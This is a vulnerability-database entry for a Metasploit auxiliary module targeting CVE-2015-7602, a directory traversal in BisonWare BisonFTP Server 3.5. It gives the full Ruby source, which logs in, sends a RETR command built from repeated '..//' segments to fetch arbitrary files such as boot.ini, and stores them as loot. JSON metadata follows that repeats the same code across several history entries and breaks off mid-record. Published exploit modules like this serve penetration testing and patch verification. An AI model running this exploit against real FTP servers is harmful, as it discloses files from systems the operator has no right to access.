BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure
2015-11-08T05:34:10
ID MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL Type metasploit Reporter Rapid7 Modified 2017-07-24T13:26:21
Description
This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',
'Description' => %q{
This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server
version 3.5. This vulnerability allows an attacker to download arbitrary files from the server
by crafting a RETR command including file system traversal strings such as '..//.'
},
'Platform' => 'win',
'Author' =>
[
'Jay Turla', # @shipcod3, msf and initial discovery
'James Fitts',
'Brad Wolfe <brad.wolfe[at]gmail.com>'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '38341'],
[ 'CVE', '2015-7602']
],
'DisclosureDate' => 'Sep 28 2015'
))
register_options(
[
OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),
OptString.new('PATH', [ true, "Path to the file to disclose, releative to the root dir.", 'boot.ini'])
])
end
def check_host(ip)
begin
connect
if /BisonWare BisonFTP server product V3\.5/i === banner
return Exploit::CheckCode::Appears
end
ensure
disconnect
end
Exploit::CheckCode::Safe
end
def run_host(target_host)
begin
connect_login
sock = data_connect
# additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb
# and #7582
if sock.nil?
error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
print_status(error_msg)
elog(error_msg)
else
file_path = datastore['PATH']
file = ::File.basename(file_path)
# make RETR request and store server response message...
retr_cmd = ( "..//" * datastore['DEPTH'] ) + "#{file_path}"
res = send_cmd( ["RETR", retr_cmd])
# read the file data from the socket that we opened
# dont assume theres still a sock to read from. Per #7582
if sock.nil?
error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
print_status(error_msg)
elog(error_msg)
return
else
# read the file data from the socket that we opened
response_data = sock.read(1024)
end
unless response_data
print_error("#{file} not found")
return
end
if response_data.length == 0
print_status("File (#{file_path})from #{peer} is empty...")
return
end
# store file data to loot
loot_file = store_loot("bisonware.ftp.data", "text", rhost, response_data, file, file_path)
vprint_status("Data returned:\n")
vprint_line(response_data)
print_good("Stored #{file_path} to #{loot_file}")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
vprint_error(e.message)
elog("#{e.class} #{e.message} #{e.backtrace * "\n"}")
rescue ::Timeout::Error, ::Errno::EPIPE => e
vprint_error(e.message)
elog("#{e.class} #{e.message} #{e.backtrace * "\n"}")
ensure
data_disconnect
disconnect
end
end
end
{"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "191bc545a883cb2ca75e6977a6879512", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-03-28T13:30:55", "history": [{"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-05-03T20:42:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/ftp/bison_ftp_traversal", "reporter": "Rapid7", "references": ["http://www.exploit-db.com/exploits/38341/", "http://cvedetails.com/cve/cve-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2017-07-02T23:18:07", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2017-07-02T23:18:07", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/ftp/bison_ftp_traversal", "reporter": "Rapid7", "references": ["http://www.exploit-db.com/exploits/38341/", "http://cvedetails.com/cve/cve-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2017-07-24T19:57:27", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2017-07-24T19:57:27", "differentElements": ["href", "references"], "edition": 2}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2017-08-21T15:29:17", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2017-08-21T15:29:17", "value": 6.3}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2017-08-21T15:29:17", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-01-28T22:01:18", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-01-28T22:01:18", "value": 6.3}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-01-28T22:01:18", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-01-29T00:01:18", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-01-29T00:01:18", "value": 6.3}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-01-29T00:01:18", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-02-08T10:10:12", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-02-08T10:10:12", "value": 6.3}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", 